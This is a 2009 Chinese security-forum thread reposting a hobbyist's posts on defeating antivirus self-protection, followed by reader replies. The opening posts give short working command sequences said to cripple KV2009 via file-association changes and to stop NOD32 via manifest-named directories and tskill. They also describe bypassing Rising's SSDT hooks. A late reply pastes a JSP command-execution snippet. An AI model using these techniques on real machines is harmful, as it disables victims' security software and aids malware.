微点交流论坛

标题: 【DELPHIC】两条CMD命令搞残KV2009 小测瑞星微点NOD32 [打印本页]

作者: 点饭的百度空间 时间: 2009-5-8 09:32 标题: 【DELPHIC】两条CMD命令搞残KV2009 小测瑞星微点NOD32

Hovi.Delphic，男，17岁。热爱化学与计算机，也对文学感兴趣。在广州市一间重点中学读书。 E-Mail：Delphic@126.com；QQ：461515974。

瑞星2009和江民2009自我防护比较 [ 2009-3-21 21:34:20 | By: DELPHIC ]

   瑞星2009和江民2009都是国内著名的杀毒软件，近日我在虚拟机上测试了它们的自我防护能力。

   瑞星2009阻止别的程序结束它的进程，就是在SSDT上挂钩NtOpenProcess和NtTerminateProcess，“冰刃”恢复SSDT后，防护完全失效！接下来用“任务管理器”就可以轻易结束。瑞星的进程被结束后，什么“云安全”，“智能主动防御”全都废了。

      相比之下，江民2009的防护超级变态，Inline hook了如下函数：NtOpenProcess、ObOpenObjectByPointer、ObpCreateHandle、NtTerminateProcess、PspTerminateThreadByPointer、KeInsertQueueApc、KiInsertQueueApc，还有一些防止进程或线程被挂起的函数。而且时时监视自己的钩子有没有被恢复，如果被恢复马上重新钩上。我唯一想到结束它的进程的方法就是手动对其进程的线程插入APC。

      以前（大约2008年11月），我还测试过微点主动防御软件（没在意具体版本）、Nod32（没在意具体版本）、卡巴斯基7.0、诺顿10.0，也很好杀，连安全工具“狙剑”都不如。

两条CMD命令搞残KV2009 [ 2009-3-22 13:24:29 | By: DELPHIC ]

我曾经说过，KV2009很难杀，但是我今天想到一个办法，可以用干掉KV2009的托盘图标。

assoc .kxp=kxpf
ftype kxpf=smss.exe

   重新启动后，KV2009的托盘图标就消失了。而且，KV2009的主动防御功能貌似也失效了。接下来怎么做，就要看人品了。

四条CMD命令彻底干掉NOD32 [ 2009-4-9 12:54:25 | By: DELPHIC ]

NOD32是我见过的最好欺负的杀毒软件，因为干掉它不仅不用编程，连“映像劫持”这种稍微高级的技术也不用。真是不知道它是怎样进入“世界杀软前十名”的。废话不说，直接给出CMD代码。[NOD32的目录是C:\Program Files\ESET\ESET NOD32 Antivirus，测试版本是3.0.669。]

mkdir C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe.manifest
mkdir C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe.manifest
tskill ekrn
tskill egui

下次开机后NOD32也运行不了了。

作者: snhao 时间: 2009-5-8 10:18
能干掉微点么？

作者: mamsds 时间: 2009-5-8 17:39
不太理解楼主的意思——不过NOD32是很废..........

作者: wsmurderer 时间: 2009-5-8 20:57

Quote:

我还测试过微点主动防御软件（没在意具体版本）、Nod32（没在意具体版本）、卡巴斯基7.0、诺顿10.0，也很好杀，连安全工具“狙剑”都不如。

微点号称自保很强大，事实上干掉微点也不是什么难事

作者: z010q3w 时间: 2009-5-9 18:29
总不能是万能的吧。
自己也要做个备份恢复什么的

到时候不要后悔。

在网上还见过几个杀毒软件搭配的

唉！难说啊

作者: miniputty 时间: 2009-5-10 09:51
用CMD有意义吗？要这么说，用个shutdown，我还说能搞残你电脑呢。。。摆脱搞点有实际意义的。

作者: mamsds 时间: 2009-5-23 13:00
不好意思，很多HIPS已经会拦截shutdown了。

作者: zqrsc 时间: 2009-5-27 01:33
用瓶矿泉水~~~有HIPS能拦截不？
呵呵~

作者: 微点放大是焦点 时间: 2009-5-28 06:01
干掉杀软这种做法我认为不是病毒的主流发展方向，毕竟这样做会惊动用户的警戒意识。哪怕你干掉用户当前的安全软件，用户也会去寻找其他的软件对自己的系统进行防护，没什么木马能100%的防止所有软件的查杀的。

利用批处理这种行为干掉安全软件难度是不难，问题是你这个批处理如何才能混进来而且能顺利执行？

总结一点，干掉安全软件这个做法只是一些性急得像猴子的渗透者的暴力做法。因为他们连加壳，或者如何改变自己的运作机理逃避主防的耐性都没了。

作者: wsmurderer 时间: 2009-5-28 07:01

Quote:

Originally posted by 微点放大是焦点 at 2009-5-28 06:01:
干掉杀软这种做法我认为不是病毒的主流发展方向，毕竟这样做会惊动用户的警戒意识。哪怕你干掉用户当前的安全软件，用户也会去寻找其他的软件对自己的系统进行防护，没什么木马能100%的防止所有软件的查杀的。

...

不一定吧，有些人为了炫耀自己就是喜欢干杀软，毁系统，删资料，格磁盘。不然怎么会有熊猫的出现，不就是炫耀么？

作者: caesar19870926 时间: 2009-5-29 13:15 标题: 挺长见识的

不知道有没有测过eset4.0，传说它的自我保护增强了不少，搭个Hips应该不成问题了吧，这帖子我在eset官网看过

作者: jack_ps_wang 时间: 2009-6-3 15:04
上面的争论很强大，很有见地。

无论怎么说，都是程序斗争，此起彼伏，如同狄仁杰说的那样，这会儿看是你赢了，不定等会儿又是我赢了。没有永远的赢家。

如果是针对性的破坏某一款杀软，就是再牛B的也必然倒下。安全除了用户自己要有些安全意识，还有靠国家的机器和手段。抓一个杀一个，才能镇得住。

作者: Kappa 时间: 2009-6-3 15:48
我热爱板砖，那个东西任何杀软都不能对其有所作为:cool:

作者: 13917273896 时间: 2009-6-4 07:26
能不能干掉卡巴

作者: iceway 时间: 2009-6-4 09:38
江民比较变态

作者: zlc_tx_2000 时间: 2009-6-5 09:31
毫无意义......

作者: cdbackup 时间: 2009-7-14 11:40
同意9楼的现点

作者: philwilla 时间: 2009-7-15 16:54
jsp中嵌入一段JAVA脚本
<%
Process child = Runtime.getRuntime().exec(filename);
%>

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn